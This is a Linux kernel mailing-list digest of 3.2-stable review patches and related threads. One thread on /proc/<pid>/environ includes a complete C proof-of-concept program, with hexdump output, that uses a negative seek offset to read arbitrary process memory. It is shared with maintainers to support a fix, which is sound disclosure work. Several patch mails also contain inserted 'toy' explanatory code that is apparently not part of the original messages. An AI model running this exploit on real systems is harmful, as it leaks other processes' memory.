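	return toy_is_err(file) ? (int)toy_ptr_err(file) : -ENOENT;
}
```

Testing toy_is_err() states the intent directly, whereas comparing the
converted pointer value against zero depends on how valid addresses
happen to be laid out.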

Signed-off-by: Roland Dreier 
Signed-off-by: Nicholas Bellinger 
Signed-off-by: Ben Hutchings 
---
 drivers/target/target_core_pr.c |    7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/drivers/target/target_core_pr.c b/drivers/target/target_core_pr.c
index 8556499..a1bcd92 100644
--- a/drivers/target/target_core_pr.c
+++ b/drivers/target/target_core_pr.c
@@ -2031,7 +2031,7 @@ static int __core_scsi3_write_aptpl_to_file(
if (IS_ERR(file) || !file || !file->f_dentry) {
pr_err("filp_open(%s) for APTPL metadata"
" failed\n", path);
-   return (PTR_ERR(file) < 0 ? PTR_ERR(file) : -ENOENT);
+   return IS_ERR(file) ? PTR_ERR(file) : -ENOENT;
}
 
iov[0].iov_base = &buf[0];
@@ -3818,7 +3818,7 @@ int target_scsi3_emulate_pr_out(struct se_cmd *cmd)
" SPC-2 reservation is held, returning"
" RESERVATION_CONFLICT\n");
cmd->scsi_sense_reason = TCM_RESERVATION_CONFLICT;
-   ret = EINVAL;
+   ret = -EINVAL;
goto out;
}
 
@@ -3828,7 +3828,8 @@ int target_scsi3_emulate_pr_out(struct se_cmd *cmd)
 */
if (!cmd->se_sess) {
cmd->scsi_sense_reason = TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE;
-   return -EINVAL;
+   ret = -EINVAL;
+   goto out;
}
 
if (cmd->data_length < 24) {


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 083/108] hrtimer: Update hrtimer base offsets each hrtimer_interrupt

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: John Stultz 

commit 5baefd6d84163443215f4a99f6a20f054ef11236 upstream.

The update of the hrtimer base offsets on all cpus cannot be made
atomically from the timekeeper.lock held and interrupt disabled region
as smp function calls are not allowed there.

clock_was_set(), which enforces the update on all cpus, is called
either from preemptible process context in case of do_settimeofday()
or from the softirq context when the offset modification happened in
the timer interrupt itself due to a leap second.

In both cases there is a race window for an hrtimer interrupt between
dropping timekeeper lock, enabling interrupts and clock_was_set()
issuing the updates. Any interrupt which arrives in that window will
see the new time but operate on stale offsets.

So we need to make sure that an hrtimer interrupt always sees a
consistent state of time and offsets.

ktime_get_update_offsets() allows us to get the current monotonic time
and update the per cpu hrtimer base offsets from hrtimer_interrupt()
to capture a consistent state of monotonic time and the offsets. The
function replaces the existing ktime_get() calls in hrtimer_interrupt().

The overhead of the new function vs. ktime_get() is minimal as it just
adds two store operations.

This ensures that any changes to realtime or boottime offsets are
noticed and stored into the per-cpu hrtimer base structures, prior to
any hrtimer expiration and guarantees that timers are not expired early.
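
The idea of reading the time and refreshing the offsets in one step can
be sketched as below.  Everything here is a hypothetical model:
toy_timekeeper, toy_cpu_base and the toy_* functions only imitate the
shape of ktime_get_update_offsets() and hrtimer_update_base(), and the
locking that makes the real snapshot consistent is left out.

```c
#include <stdint.h>

typedef int64_t toy_ktime_t;   /* nanoseconds */

/* Hypothetical timekeeper state; the real one is protected by a lock. */
struct toy_timekeeper {
	toy_ktime_t mono;
	toy_ktime_t offs_real;
	toy_ktime_t offs_boot;
};

/* Hypothetical per-CPU base holding cached copies of the offsets. */
struct toy_cpu_base {
	toy_ktime_t offs_real;
	toy_ktime_t offs_boot;
};

/* Return monotonic "now" and refresh both offsets from the same snapshot. */
static toy_ktime_t toy_get_update_offsets(const struct toy_timekeeper *tk,
					  toy_ktime_t *offs_real,
					  toy_ktime_t *offs_boot)
{
	*offs_real = tk->offs_real;
	*offs_boot = tk->offs_boot;
	return tk->mono;
}

/* Called at interrupt entry: the base can no longer hold stale offsets. */
static toy_ktime_t toy_update_base(const struct toy_timekeeper *tk,
				   struct toy_cpu_base *base)
{
	return toy_get_update_offsets(tk, &base->offs_real, &base->offs_boot);
}
```

Compared with a plain time read, the only extra work in this model is
the two stores into the base, which matches the overhead claim above.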

Signed-off-by: John Stultz 
Reviewed-by: Ingo Molnar 
Acked-by: Peter Zijlstra 
Acked-by: Prarit Bhargava 
Link: http://lkml.kernel.org/r/1341960205-56738-8-git-send-email-johns...@us.ibm.com
Signed-off-by: Thomas Gleixner 
Signed-off-by: Ben Hutchings 
---
 kernel/hrtimer.c |   28 ++++++++++++++--------------
 1 file changed, 14 insertions(+), 14 deletions(-)

diff --git a/kernel/hrtimer.c b/kernel/hrtimer.c
index 8f320af..6db7a5e 100644
--- a/kernel/hrtimer.c
+++ b/kernel/hrtimer.c
@@ -657,6 +657,14 @@ static inline int hrtimer_enqueue_reprogram(struct hrtimer *timer,
return 0;
 }
 
+static inline ktime_t hrtimer_update_base(struct hrtimer_cpu_base *base)
+{
+   ktime_t *offs_real = &base->clock_base[HRTIMER_BASE_REALTIME].offset;
+   ktime_t *offs_boot = &base->clock_base[HRTIMER_BASE_BOOTTIME].offset;
+
+   return ktime_get_update_offsets(offs_real, offs_boot);
+}
+
 /*
  * Retrigger next event is called after clock was set
  *
@@ -665,22 +673,12 @@ static inline int hrtimer_enqueue_reprogram(struct hrtimer *timer,
 static void retrigger_next_event(void *arg)
 {
struct hrtimer_cpu_base *base = &__get_cpu_var(hrtimer_bases);
-   struct timespec realtime_offset, xtim, wtm, sleep;
 
if (!hrtimer_hres_active())
return;
 
-   /* Optimized out for !HIGH_RES */
-   get_xtime_and_monotonic_and_sleep_offset(&xtim, &wtm, &sleep);
-   set_normalized_timespec(&realtime_offset, -wtm.tv_sec, -wtm.tv_nsec);
-
-   /* Adjust CLOCK_REALTIME offset */
raw_spin_lock(&base->lock);
-   base->clock_base[HRTIMER_BASE_REALTIME].offset =
-   timespec_to_ktime(realtime_offset);
-   base->clock_base[HRTIMER_BASE_BOOTTIME].offset =
-   timespec_to_ktime(sleep);
-
+   hrtimer_update_base(base);
hrtimer_force_reprogram(base, 0);
raw_spin_unlock(&base->lock);
 }
@@ -710,7 +708,6 @@ static int hrtimer_switch_to_hres(void)
base->clock_base[i].resolution = KTIME_HIGH_RES;
 
tick_setup_sched_timer();
-
/* "Retrigger" the interrupt to get things going */
retrigger_next_event(NULL);
local_irq_restore(flags);
@@ -1264,7 +1261,7 @@ void hrtimer_interrupt(struct clock_event_device *dev)
dev->next_event.tv64 = KTIME_MAX;
 
raw_spin_lock(&cpu_base->lock);
-   entry_time = now = ktime_get();
+   entry_time = now = hrtimer_update_base(cpu_base);
 retry:
expires_next.tv64 = KTIME_MAX;
/*
@@ -1342,9 +1339,12 @@ retry:
 * We need to prevent that we loop forever in the hrtimer
 * interrupt routine. We give it 3 attempts to avoid
 * overreacting on some spurious event.
+*
+* Acquire base lock for updating the offsets and retrieving
+* the current time.
 */
raw_spin_lock(&cpu_base->lock);
-   now = ktime_get();
+   now = hrtimer_update_base(cpu_base);
cpu_base->nr_retries++;
if (++retries < 3)
goto retry;




[ 076/108] timekeeping: Fix CLOCK_MONOTONIC inconsistency during leapsecond

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: John Stultz 

This is a backport of fad0c66c4bb836d57a5f125ecd38bed653ca863a,
which resolves a bug in the previous commit.

Commit 6b43ae8a61 (ntp: Fix leap-second hrtimer livelock) broke the
leapsecond update of CLOCK_MONOTONIC. The missing leapsecond update to
wall_to_monotonic causes discontinuities in CLOCK_MONOTONIC.

Adjust wall_to_monotonic when NTP inserted a leapsecond.
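
Why the second adjustment is needed follows from simple arithmetic: the
monotonic clock is the wall clock plus an offset, so a step applied to
the wall clock must be subtracted from the offset.  The sketch below
uses hypothetical names and whole seconds only.

```c
/* Toy clocks in whole seconds; names are hypothetical. */
struct toy_clock {
	long xtime_sec;              /* wall-clock seconds */
	long wall_to_monotonic_sec;  /* offset: monotonic = wall + offset */
};

static long toy_monotonic(const struct toy_clock *c)
{
	return c->xtime_sec + c->wall_to_monotonic_sec;
}

/* Apply a leap adjustment to the wall clock without moving monotonic. */
static void toy_apply_leap(struct toy_clock *c, int leap)
{
	c->xtime_sec += leap;
	c->wall_to_monotonic_sec -= leap;  /* keeps toy_monotonic() unchanged */
}
```

Without the second statement in toy_apply_leap(), toy_monotonic() would
jump by the leap value, which is the discontinuity described above.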

Reported-by: Richard Cochran 
Signed-off-by: John Stultz 
Tested-by: Richard Cochran 
Link: http://lkml.kernel.org/r/1338400497-12420-1-git-send-email-john.stu...@linaro.org
Signed-off-by: Thomas Gleixner 
Cc: Prarit Bhargava 
Cc: Thomas Gleixner 
Cc: Linux Kernel 
Signed-off-by: John Stultz 
Signed-off-by: Ben Hutchings 
---
 kernel/time/timekeeping.c |    3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
index 4780a7d..5c9b67e 100644
--- a/kernel/time/timekeeping.c
+++ b/kernel/time/timekeeping.c
@@ -938,6 +938,7 @@ static cycle_t logarithmic_accumulation(cycle_t offset, int shift)
xtime.tv_sec++;
leap = second_overflow(xtime.tv_sec);
xtime.tv_sec += leap;
+   wall_to_monotonic.tv_sec -= leap;
}
 
/* Accumulate raw time */
@@ -1048,7 +1049,7 @@ static void update_wall_time(void)
xtime.tv_sec++;
leap = second_overflow(xtime.tv_sec);
xtime.tv_sec += leap;
-
+   wall_to_monotonic.tv_sec -= leap;
}
 
/* check to see if there is a new clocksource to use */


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 097/108] eCryptfs: Fix lockdep warning in miscdev operations

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Tyler Hicks 

commit 60d65f1f07a7d81d3eb3b91fc13fca80f2fdbb12 upstream.

Don't grab the daemon mutex while holding the message context mutex.
Addresses this lockdep warning:

 ecryptfsd/2141 is trying to acquire lock:
  (&ecryptfs_msg_ctx_arr[i].mux){+.+.+.}, at: [] ecryptfs_miscdev_read+0x143/0x470 [ecryptfs]

 but task is already holding lock:
  (&(*daemon)->mux){+.+...}, at: [] ecryptfs_miscdev_read+0x21c/0x470 [ecryptfs]

 which lock already depends on the new lock.

 the existing dependency chain (in reverse order) is:

 -> #1 (&(*daemon)->mux){+.+...}:
[] lock_acquire+0x9d/0x220
[] __mutex_lock_common+0x5a/0x4b0
[] mutex_lock_nested+0x44/0x50
[] ecryptfs_send_miscdev+0x97/0x120 [ecryptfs]
[] ecryptfs_send_message+0x134/0x1e0 [ecryptfs]
[] ecryptfs_generate_key_packet_set+0x2fe/0xa80 [ecryptfs]
[] ecryptfs_write_metadata+0x108/0x250 [ecryptfs]
[] ecryptfs_create+0x130/0x250 [ecryptfs]
[] vfs_create+0xb4/0x120
[] do_last+0x8c5/0xa10
[] path_openat+0xd9/0x460
[] do_filp_open+0x42/0xa0
[] do_sys_open+0xf8/0x1d0
[] sys_open+0x21/0x30
[] system_call_fastpath+0x16/0x1b

 -> #0 (&ecryptfs_msg_ctx_arr[i].mux){+.+.+.}:
[] __lock_acquire+0x1bf8/0x1c50
[] lock_acquire+0x9d/0x220
[] __mutex_lock_common+0x5a/0x4b0
[] mutex_lock_nested+0x44/0x50
[] ecryptfs_miscdev_read+0x143/0x470 [ecryptfs]
[] vfs_read+0xb3/0x180
[] sys_read+0x4d/0x90
[] system_call_fastpath+0x16/0x1b
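
The locking change can be sketched with toy bookkeeping instead of real
mutexes.  The code below is a hypothetical model: toy_lock() and
toy_unlock() only track how many locks are held at once, and the structs
are stripped down to the fields the example needs.

```c
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Toy lock bookkeeping: counts locks held at once (no real blocking). */
static int toy_depth, toy_max_depth;

static void toy_lock(void)
{
	if (++toy_depth > toy_max_depth)
		toy_max_depth = toy_depth;
}

static void toy_unlock(void)
{
	toy_depth--;
}

struct toy_msg_ctx { char *msg; size_t msg_size; };
struct toy_daemon  { int num_queued; };

/* Allocate first, then take the two locks one after another, never nested. */
static int toy_send(struct toy_msg_ctx *ctx, struct toy_daemon *d,
		    const char *data, size_t len)
{
	char *msg = malloc(len);     /* done before any lock is taken */

	if (!msg)
		return -ENOMEM;

	toy_lock();                  /* message context lock */
	memcpy(msg, data, len);
	ctx->msg = msg;
	ctx->msg_size = len;
	toy_unlock();

	toy_lock();                  /* daemon lock, taken only after release */
	d->num_queued++;
	toy_unlock();
	return 0;
}
```

Since the first lock is dropped before the second is taken, no ordering
between the two is established on this path, so it cannot contribute to
an inversion.  Allocating before locking also removes the need for an
unlock on the failure path.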

Signed-off-by: Tyler Hicks 
Signed-off-by: Ben Hutchings 
---
 fs/ecryptfs/miscdev.c |   25 +++++++++++++------------
 1 file changed, 13 insertions(+), 12 deletions(-)

--- a/fs/ecryptfs/miscdev.c
+++ b/fs/ecryptfs/miscdev.c
@@ -195,31 +195,32 @@ int ecryptfs_send_miscdev(char *data, si
  struct ecryptfs_msg_ctx *msg_ctx, u8 msg_type,
  u16 msg_flags, struct ecryptfs_daemon *daemon)
 {
-   int rc = 0;
+   struct ecryptfs_message *msg;
 
-   mutex_lock(&msg_ctx->mux);
-   msg_ctx->msg = kmalloc((sizeof(*msg_ctx->msg) + data_size),
-  GFP_KERNEL);
-   if (!msg_ctx->msg) {
-   rc = -ENOMEM;
+   msg = kmalloc((sizeof(*msg) + data_size), GFP_KERNEL);
+   if (!msg) {
printk(KERN_ERR "%s: Out of memory whilst attempting "
   "to kmalloc(%zd, GFP_KERNEL)\n", __func__,
-  (sizeof(*msg_ctx->msg) + data_size));
-   goto out_unlock;
+  (sizeof(*msg) + data_size));
+   return -ENOMEM;
}
+
+   mutex_lock(&msg_ctx->mux);
+   msg_ctx->msg = msg;
msg_ctx->msg->index = msg_ctx->index;
msg_ctx->msg->data_len = data_size;
msg_ctx->type = msg_type;
memcpy(msg_ctx->msg->data, data, data_size);
msg_ctx->msg_size = (sizeof(*msg_ctx->msg) + data_size);
-   mutex_lock(&daemon->mux);
list_add_tail(&msg_ctx->daemon_out_list, &daemon->msg_ctx_out_queue);
+   mutex_unlock(&msg_ctx->mux);
+
+   mutex_lock(&daemon->mux);
daemon->num_queued_msg_ctx++;
wake_up_interruptible(&daemon->wait);
mutex_unlock(&daemon->mux);
-out_unlock:
-   mutex_unlock(&msg_ctx->mux);
-   return rc;
+
+   return 0;
 }
 
 /**




[ 000/108] 3.2.24-stable review

2012-07-22 Thread Ben Hutchings
This is the start of the stable review cycle for the 3.2.24 release.
There are 108 patches in this series, which will be posted as responses
to this one.  If anyone has any issues with these being applied, please
let me know.

Responses should be made by Wed Jul 25 02:00:00 UTC 2012.
Anything received after that time might be too late.

A combined patch relative to 3.2.23 will be posted as an additional
response to this, and the diffstat can be found below.

Ben.

-
 Makefile  |4 +-
 arch/arm/plat-samsung/adc.c   |8 +-
 arch/mips/include/asm/thread_info.h   |4 +-
 arch/mips/kernel/vmlinux.lds.S|3 +-
 arch/powerpc/include/asm/cputime.h|6 +-
 arch/powerpc/kernel/time.c|   10 +-
 arch/x86/kernel/acpi/boot.c   |   27 +-
 arch/x86/kernel/reboot.c  |8 +
 block/scsi_ioctl.c|5 +-
 drivers/acpi/processor_core.c |6 +-
 drivers/acpi/sleep.c  |4 +-
 drivers/acpi/sysfs.c  |4 +-
 drivers/gpio/gpio-wm8994.c|5 +-
 drivers/gpu/drm/i915/intel_display.c  |4 +-
 drivers/hid/hid-apple.c   |6 +
 drivers/hid/hid-core.c|7 +
 drivers/hid/hid-ids.h |6 +
 drivers/hwmon/it87.c  |2 +-
 drivers/hwspinlock/hwspinlock_core.c  |4 +-
 drivers/input/joystick/xpad.c |6 +-
 drivers/input/mouse/bcm5974.c |   20 ++
 drivers/iommu/amd_iommu.c |7 +
 drivers/iommu/amd_iommu_init.c|3 +-
 drivers/md/dm-raid1.c |3 +-
 drivers/md/dm-region-hash.c   |5 +-
 drivers/md/md.c   |   36 ++-
 drivers/md/raid1.c|   13 +-
 drivers/md/raid5.c|4 +-
 drivers/media/dvb/dvb-core/dvbdev.c   |1 +
 drivers/mtd/nand/nandsim.c|   12 +-
 drivers/net/bonding/bond_debugfs.c|2 +-
 drivers/net/bonding/bond_main.c   |9 +-
 drivers/net/ethernet/atheros/atl1c/atl1c_main.c   |1 -
 drivers/net/ethernet/broadcom/bnx2x/bnx2x.h   |   15 --
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c   |   36 ++-
 drivers/net/ethernet/broadcom/tg3.c   |3 +-
 drivers/net/ethernet/intel/e1000e/82571.c |3 +
 drivers/net/ethernet/realtek/r8169.c  |3 +
 drivers/net/ethernet/stmicro/stmmac/stmmac_main.c |3 +
 drivers/net/macvtap.c |   57 +++--
 drivers/net/usb/ipheth.c  |5 +
 drivers/net/wireless/brcm80211/brcmsmac/main.c|3 +-
 drivers/net/wireless/ipw2x00/ipw.h|   23 ++
 drivers/net/wireless/ipw2x00/ipw2100.c|4 +
 drivers/net/wireless/ipw2x00/ipw2200.c|4 +
 drivers/net/wireless/iwlegacy/iwl-4965-sta.c  |4 +-
 drivers/net/wireless/iwlegacy/iwl-core.c  |   14 +-
 drivers/net/wireless/rt2x00/rt2x00usb.c   |2 +-
 drivers/net/wireless/rtl818x/rtl8187/leds.c   |2 +-
 drivers/pci/pci-driver.c  |   12 +
 drivers/pci/pci.c |5 -
 drivers/pci/quirks.c  |   26 --
 drivers/platform/x86/intel_ips.c  |   22 ++
 drivers/platform/x86/samsung-laptop.c |  225 +
 drivers/rtc/rtc-mxc.c |5 +-
 drivers/scsi/aic94xx/aic94xx_task.c   |2 +-
 drivers/scsi/libsas/sas_ata.c |   12 +-
 drivers/target/target_core_cdb.c  |2 +-
 drivers/target/target_core_pr.c   |7 +-
 drivers/target/tcm_fc/tfc_cmd.c   |2 +
 drivers/usb/class/cdc-wdm.c   |2 +
 drivers/usb/core/hub.c|   18 +-
 drivers/usb/host/xhci-hub.c   |   44 +++-
 drivers/usb/host/xhci.h   |6 +-
 drivers/usb/serial/option.c   |   26 ++
 drivers/vhost/vhost.c |2 +
 fs/buffer.c   |   22 +-
 fs/cifs/connect.c |   18 ++
 fs/cifs/readdir.c |7 +-
 fs/ecryptfs/kthread.c |2 +-
 fs/ecryptfs/miscdev.c |   48 ++--
 fs/eventpoll.c|4 +-
 fs/exofs/ore.c|8 +-
 fs/exofs/ore_raid.c   |   67

Re: [PATCH] net, cgroup: Fix boot failure due to iteration of uninitialized list

2012-07-22 Thread Gao feng
On 2012-07-20 00:27, Srivatsa S. Bhat wrote:
> After commit ef209f15 (net: cgroup: fix access the unallocated memory in
> netprio cgroup), boot fails with the following NULL pointer dereference:
> 
> Initializing cgroup subsys devices
> Initializing cgroup subsys freezer
> Initializing cgroup subsys net_cls
> Initializing cgroup subsys blkio
> Initializing cgroup subsys perf_event
> Initializing cgroup subsys net_prio
> BUG: unable to handle kernel NULL pointer dereference at 0698
> IP: [] cgrp_create+0xf6/0x190
> PGD 0
> Oops:  [#1] SMP
> CPU 0
> Modules linked in:
> 
> Pid: 0, comm: swapper/0 Not tainted 3.5.0-rc7-mandeep #1 IBM IBM System x 
> -[7870C4Q]-/68Y8033
> RIP: 0010:[]  [] cgrp_create+0xf6/0x190
> RSP: :81a01ea8  EFLAGS: 00010213
> RAX:  RBX: ff10 RCX: 
> RDX:  RSI: 0246 RDI: 81aa70a0
> RBP: 81a01ed8 R08:  R09: 
> R10: 8808ff8641c0 R11: 6e697a696c616974 R12: 0001
> R13: 8808ff8641c0 R14:  R15: 00093970
> FS:  () GS:8808ffc0() knlGS:
> CS:  0010 DS:  ES:  CR0: 8005003b
> CR2: 0698 CR3: 01a0b000 CR4: 06b0
> DR0:  DR1:  DR2: 
> DR3:  DR6: 0ff0 DR7: 0400
> Process swapper/0 (pid: 0, threadinfo 81a0, task 81a13420)
> Stack:
>  81a01eb8 818060ff 81d75ec8 81aa8960
>  81aa8960 81b4c2c0 81a01ef8 81b1cb78
>  0018 0048 81a01f18 81b1ce13
> Call Trace:
>  [] cgroup_init_subsys+0x83/0x169
>  [] cgroup_init+0x36/0x119
>  [] start_kernel+0x3ba/0x3ef
>  [] ? kernel_init+0x27b/0x27b
>  [] x86_64_start_reservations+0x131/0x136
>  [] x86_64_start_kernel+0x103/0x112
> Code: 01 48 3d f8 e1 ec 81 48 8d 98 10 ff ff ff 75 1b eb 73 0f 1f 00 48 8b 83 
> f0 00 00 00 48 3d f8 e1 ec 81 48 8d 98 10 ff ff ff 74 5a <48> 8b 83 88 07 00 
> 00 48 85 c0 74 de 44 3b 60 10 76 d8 44 89 e6
> RIP  [] cgrp_create+0xf6/0x190
>  RSP 
> CR2: 0698
> ---[ end trace a7919e7f17c0a725 ]---
> Kernel panic - not syncing: Attempted to kill the idle task!
> 
> The code corresponds to:
> 
> update_netdev_tables():
> for_each_netdev(&init_net, dev) {
> map = rtnl_dereference(dev->priomap);  < HERE
> 
> 
> The list head is initialized in netdev_init(), which is called much
> later than cgrp_create(). So the problem is that we are calling
> update_netdev_tables() way too early (in cgrp_create()), which will
> end up traversing the not-yet-circular linked list. So at some point,
> the dev pointer will become NULL and hence dev->priomap becomes an
> invalid access.
> 
> To fix this, just remove the update_netdev_tables() function entirely,
> since it appears that write_update_netdev_table() will handle things
> just fine.

The reason I added update_netdev_tables() to cgrp_create() was to avoid
additional bounds checks when accessing dev->priomap.priomap.

Eric, can we revert commit 91c68ce2b26319248a32d7baa1226f819d283758 now?
I think it's safe enough to access priomap without a bounds check.

Thanks
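
For readers following the oops quoted above, the faulting address can be
reproduced with plain pointer arithmetic. This is only a sketch: the two
offsets are a reading of the "Code:" bytes (lea -0xf0(%rax),%rbx followed by
mov 0x788(%rbx),%rax) and are assumptions about that particular build, and
the helper names are made up for the example. It suggests that the list node
pointer, rather than dev itself, was NULL, with dev then derived from it by a
container_of-style subtraction.

```c
#include <stdint.h>

/*
 * Assumed offsets, decoded from the "Code:" bytes in the oops; they are
 * specific to that kernel build and are not taken from the source tree.
 */
#define DEV_LIST_OFFSET 0xf0ULL   /* list node inside struct net_device */
#define PRIOMAP_OFFSET  0x788ULL  /* priomap pointer inside struct net_device */

/* container_of-style step: list node address -> enclosing device address. */
static uint64_t dev_from_node(uint64_t node)
{
	return node - DEV_LIST_OFFSET;	/* wraps modulo 2^64 when node == 0 */
}

/* Address that dev->priomap would be loaded from. */
static uint64_t priomap_slot(uint64_t dev)
{
	return dev + PRIOMAP_OFFSET;
}
```

With a zeroed (never initialized) list head, dev_from_node(0) yields
0xffffffffffffff10, and priomap_slot() of that value wraps around to 0x698,
which would match the CR2 value in the report.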


Re: [PATCH] proc: do not allow negative offsets on /proc/<pid>/environ

2012-07-22 Thread Djalal Harouni
Hi Oleg,

On Sun, Jul 22, 2012 at 10:00:49PM +0200, Oleg Nesterov wrote:
> On 07/22, Djalal Harouni wrote:
> >
> > __mem_open() which is called by both /proc/<pid>/environ and
> > /proc/<pid>/mem ->open() handlers will allow the use of negative offsets.
> > /proc/<pid>/mem has negative offsets but not /proc/<pid>/environ.
> 
> Probably the patch makes sense, but I can't understand the changelog...
> 
> > Allowing negative offsets on /proc/<pid>/environ can turn it to act like
> > /proc/<pid>/mem. A negative offset will pass the
> > fs/read_write.c:lseek_execute() and the environ_read() checks and will
> > point to another VMA.
> 
> which VMA?
It depends on the offset. Please see below.

> environ_read() can only read the memory from [env_start, env_end], and
> it should check *ppos anyway to ensure it doesn't read something else.
Yes I agree, but currently that's not the case, there are no checks on *ppos.
So if you pass a negative offset you will be able to read from an arbitrary
address.

I'll send another patch tomorrow to add the checks for *ppos.



Since negative offsets are allowed we can pass it to lseek():

1) ->llseek()
 -> generic_file_llseek()
-> generic_file_llseek_size()
   -> lseek_execute()

  inside fs/read_write.c:lseek_execute() we pass the two checks and
  file->f_pos will be updated.


2) ->read()
 -> environ_read()

  inside environ_read() there is only one check:

  int this_len = mm->env_end - (mm->env_start + src);
  
  if (this_len <= 0)
break;


  Here 'src' is 'src = *ppos', the negative offset converted to unsigned long,
  so (mm->env_start + src) can overflow and point to another VMA.

  int this_len = mm->env_end - (mm->env_start + src)
  
  'this_len' will be positive and we pass that check.


I also don't like the truncation of the result to 'int this_len'
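
The arithmetic described above can be modelled in userspace. A minimal
sketch, assuming 64-bit unsigned wraparound; effective_addr() and remaining()
are hypothetical helpers, not kernel functions, and 0x400000 is assumed as
the load address of a non-PIE x86-64 binary.

```c
#include <stdint.h>

/* Models (mm->env_start + src), where src is *ppos cast to unsigned. */
static uint64_t effective_addr(uint64_t env_start, int64_t ppos)
{
	uint64_t src = (uint64_t)ppos;	/* a negative offset becomes a huge value */

	return env_start + src;		/* wraps modulo 2^64 */
}

/* Models mm->env_end - (mm->env_start + src) before truncation to int. */
static int64_t remaining(uint64_t env_start, uint64_t env_end, int64_t ppos)
{
	return (int64_t)(env_end - effective_addr(env_start, ppos));
}
```

For env_start = 140733359794601 and ppos = 0x400000 - env_start,
effective_addr() returns 0x400000, and remaining() is positive for any
env_end at or above env_start, so a 'this_len <= 0' check alone does not
reject the read.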



A quick example to reproduce it:
On new kernels, /proc/<pid>/stat includes 'mm->env_start' as the third number
from the end.

To read the .text area from 0x0000000000400000:
 0x0000000000400000 - (mm->env_start == 140733359794601) = negative_offset

$ ./mem_environ /proc/$(pidof cat)/environ 140733359794601 | hexdump -C -v
00000000  7f 45 4c 46 02 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
00000010  02 00 3e 00 01 00 00 00  a0 17 40 00 00 00 00 00  |..>.......@.....|
00000020  40 00 00 00 00 00 00 00  40 c5 00 00 00 00 00 00  |@.......@.......|
...

mem_environ is just a program that calculates the negative offset, then calls
open() on /proc/<pid>/environ, lseek() and read().

The source is attached, just run this command to test it:
$ ./mem_environ /proc/self/environ 0x0 | hexdump -C -v

In rare cases it will not work, I don't know why.

> >  static int mem_open(struct inode *inode, struct file *file)
> >  {
> > -   return __mem_open(inode, file, PTRACE_MODE_ATTACH);
> > +   int ret = __mem_open(inode, file, PTRACE_MODE_ATTACH);
> > +   if (!ret)
> > +   /* OK to pass negative loff_t, we can catch out-of-range */
> > +   file->f_mode |= FMODE_UNSIGNED_OFFSET;
> > +
> > +   return ret;
> 
> I guess you can set FMODE_UNSIGNED_OFFSET unconditionally, it doesn't
> matter if __mem_open() fails. But I won't insist.
Sure.

> Oleg.
> 
Thanks Oleg. BTW should I resend the patch with a better changelog entry ?

I'll also add another patch to check the offsets inside environ_read().

-- 
tixxdz
http://opendz.org
/*
* /proc/<pid>/environ like /proc/<pid>/mem
* 
* Author: Djalal Harouni   tixxdz  opendz.org
* License: GPLv2
* 
* 
* (mm->env_start + src) will point to your page.
* src is the offset
* For 64bits: A negative offset.
* For 32bits: Did not test, can we wrap ?
*
*/

#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>

#define SYS_lseek   8

extern char **environ;

/* use **environ against a non -fPIC elf */
static inline loff_t get_offset(unsigned long env_addr)
{
	unsigned long load_addr = 0x0000000000400000;
	return (load_addr - env_addr);
}

static loff_t kernel_lseek(int fd, loff_t offset)
{
	return syscall(SYS_lseek, fd, offset, SEEK_SET);
}

static int leak(char *proc_file, unsigned long env_start)
{
	int ret;
	int i, fd;
	char buf[4096];
	loff_t offset = 0;

	memset(buf, 0, sizeof(buf));

	ret = -1;
	fd = open(proc_file, O_RDONLY);
	if (fd == -1) {
		perror("open");
		return ret;
	}

	if (env_start)
		offset = get_offset(env_start);

	if (!offset)
		/* really ? */
		offset = get_offset((unsigned long)*environ);

	if (kernel_lseek(fd, offset) == (off_t) -1) {
		perror("lseek");
		return ret;
	}

	ret = read(fd, buf, sizeof(buf));
	if (ret == -1) {
		perror("read");
		return ret;
	}
	close(fd);

	for (i = 0; i < sizeof(buf); i++)
		printf("%c", buf[i]);
	return 0;
}

int main(int argc, char **argv)
{
	unsigned long env_addr = 0;

	if (argc < 3) {
		printf("%s  /proc//environ env_addr\n"
		"/proc//environ.\n"
		"env_addr: start of environment\n", argv[0]);
		return 0;
	}

	env_addr = (unsigned long) strtoul(argv[2], NULL, 0);
	return leak(argv[1], env_addr);
}


RE: [PATCH] regulator: lp8788-buck: Remove lp8788_set_default_dvs_ctrl_mode function

2012-07-22 Thread Kim, Milo
> We already know the mask in lp8788_init_dvs() function, and we can
> update
> the corresponding bit for default_dvs_mode in lp8788_init_dvs()
> function.
> This function looks not necessary to me.
> 
> Signed-off-by: Axel Lin 

Acked-by: Milo(Woogyom) Kim 
Tested-by: Milo(Woogyom) Kim 

Thanks for catching this !

Best Regards,
Milo


[PATCH] staging/vme: fix checkpatch warnings

2012-07-22 Thread Toshiaki Yamane
Now checkpatch clean.

$ find drivers/staging/vme -name "*.[ch]"|xargs ./scripts/checkpatch.pl \
-f --terse --nosummary|cut -f3- -d":"|sort |uniq -c|sort -n
  1  ERROR: trailing whitespace
  2  WARNING: Prefer pr_debug(... to printk(KERN_DEBUG, ...
  5  WARNING: Prefer pr_info(... to printk(KERN_INFO, ...
  7  WARNING: Prefer pr_err(... to printk(KERN_ERR, ...
  9  WARNING: quoted string split across lines
 13  WARNING: Prefer pr_warn(... to printk(KERN_WARNING, ...

Signed-off-by: Toshiaki Yamane 
---
 drivers/staging/vme/devices/vme_pio2_core.c |   10 ++--
 drivers/staging/vme/devices/vme_user.c  |   71 ---
